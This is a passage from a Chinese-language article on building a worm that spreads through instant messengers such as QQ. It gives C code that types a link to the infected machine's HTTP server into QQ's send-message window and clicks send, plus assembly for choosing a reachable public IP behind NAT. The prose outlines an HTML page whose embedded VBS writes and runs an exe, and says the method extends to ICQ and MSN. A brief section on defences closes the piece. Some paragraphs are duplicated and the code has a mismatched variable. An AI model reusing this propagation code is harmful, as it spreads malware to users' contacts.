3. 发送html页面的实现.
因为IE识别的是html,而不能执行exe.所以,html要包含exe.然后利用html内嵌的vbs,生成并运行exe,从而达到传播的目的。
可是,对exe编码和解码具有一定的难度,如何才能使代码最简练,最节约空间呢?这里给出一种新思路。
5) 向“发送消息(&S)"按钮发送BM_CLICK消息,发送这条信息。转1)。
DWORD WINAPI SendQQMsg(LPVOID lpParameter)
{
HKEY hKey;
char buf[256];
HWND hWnd,hTextWnd,hWndQQNumber,hWndButton;
char QQRoot[]= "Software\\QQNums\\";
char QQRootNumber[128];
int QQNumberID=0x0DF;
POINT p={50,280};
struct hostent * lpHostEnt;
char szLocalIP[30]; //形如http://202.118.224.2:5058
gethostname(buf,256);
lpHostEnt = ::gethostbyname (buf);
struct in_addr *ia=(struct in_addr *)lpHostEnt->h_addr;
::lstrcpy(szLocalIP,"http://");
::lstrcat(szLocalIP,inet_ntoa(*ia));
::lstrcat(szLocalIP,":5058");
while(TRUE)
{
::Sleep(1000);
hWnd = ::FindWindow(0,"发送消息");
if(hWnd==NULL)
continue;
hWndQQNumber=::GetDlgItem(hWnd,QQNumberID);
if(hWndQQNumber==NULL)
continue;
::SendMessage(hWndQQNumber,WM_GETTEXT,256,(long)buf);
::lstrcpy(QQRootNumber,QQRoot);
::lstrcat(QQRootNumber,buf);
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,QQRootNumber,0,
KEY_QUERY_VALUE,&hKey)!=ERROR_SUCCESS)
{
RegCreateKey(HKEY_LOCAL_MACHINE,QQRootNumber,&hKey);
hTextWnd = ::ChildWindowFromPointEx(hWnd,p,CWP_SKIPINVISIBLE);
::SendMessage(hTextWnd,WM_SETTEXT,30,(long)szLocalIP);
hWndButton = FindWindowEx(hWnd,0,0,"送讯息(&S)");
::SendMessage(hButton,BM_CLICK,0,0);
}
}
return 1;
}
3. 发送html页面的实现.
因为IE识别的是html,而不能执行exe.所以,html要包含exe.然后利用html内嵌的vbs,生成并运行exe,从而达到传播的目的。
可是,对exe编码和解码具有一定的难度,如何才能使代码最简练,最节约空间呢?这里给出一种新思路。
3.这样,当机器处于内网时,会向好友发出http://trueip:80的消息,对方则向trueip发出连接而不是内网的机器,和DRDos相似。代码如下:
IsActiveIP PROC IP : DWORD
LOCAL VSocket : DWORD
push ecx
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call socket
mov VSocket,eax
push IP
pop TestIP
push sizeof(sockaddr) ; Size of connect strucure=16
call IAI1 ; Connect structure
dw AF_INET ; Family
db 0,80 ; Port number,avoid htons :)
TestIP dd 0 ; in_addr of server
db 8 dup(0) ; Unused
IAI1:
push VSocket
call connect ;ret 0 if sucess
push eax
push VSocket
call closesocket
pop eax
pop ecx
ret 4
IsActiveIP ENDP
SelectTrueIP:
push 64
pop ecx
mov esi , offset TrueIPList
STI1: lodsd
push eax
call IsActiveIP ;ret 0 if sucess
.if eax == 0
sub esi , 4
lodsd
jmp STIExit
.else
loop STI1
.endif
xor eax , eax
STIExit:
ret
UpdateTrueIP PROC TrueIP : DWORD
push 64
pop ecx
mov esi , offset TrueIPList
UT1: lodsd
.if eax == 0
push TrueIP
pop [esi-4]
jmp UTExit
.else
loop UT1
.endif
push 64
pop ecx
mov esi , offset TrueIPList
UT2:
lodsd
push eax
call IsActiveIP ;ret 0 if sucess
.if eax != 0
push TrueIP
pop [esi-4]
jmp UTExit
.else
loop UT1
.endif
UTExit:
mov eax , TrueIP
ret 4
UpdateTrueIP ENDP
TrueIPList db 256 dup (0)
四、扩展
若把这种方法同时也应用到ICQ,MSN等IM软件,http服务器不变,只是查找发送消息窗口有所不同,但原理一样,只需要少量修改。再有一个SendMSNMsg和SendICQMsg线程即可。考虑到IM软件同时在线人数之多,再辅助以邮件等常规手段,传播速度十分可观。
五、防范措施
1、注意在线传输:常用的通讯软件如ICQ、QQ、MSN Message均提供了在线传输功能,来源不可靠的传输内容请拒绝接收;即便可靠,接收后也要经过杀毒软件的扫描方能运行。
2、小心页面链接:
如果用户在使用聊天软件时不小心上当,点击了不明网页链接,电脑就会在使用者完全不知情的情况下,从许多网站下载文件并自动运行。所以,千万别打开陌生人传来的页面链接!如果是好友送来的连接,要询问、确认后打开。这不是谁的漏洞,就象DDos攻击一样,是不可避免的正常危机。
六、结束语
QQ和MSN受到病毒侵袭的事件再一次强调了互联网世界真实的一面——任何流行的电脑程序最终都会成为被攻击的目标。
今后,我们不排除会有像CIH这样的恶性病毒通过QQ、ICQ、MSN等渠道进行广泛传播的可能,因此,加强对即时通讯软件的监控和保护是当务之急。
病毒正试图把触角延伸到所有可能的领域。与刚刚开始的攻击即时通讯软件的病毒一样,虽然手机病毒,PDA病毒等都还属于新兴“毒种”,病毒传播、侵害模式尚且属于萌芽状态,但是稍许的掉以轻心,都可能会导致巨大的不可挽回的损失。防患于未然,才是反病毒的大计。
网页显示有限 阅读全文请下载本文完整版WORD文档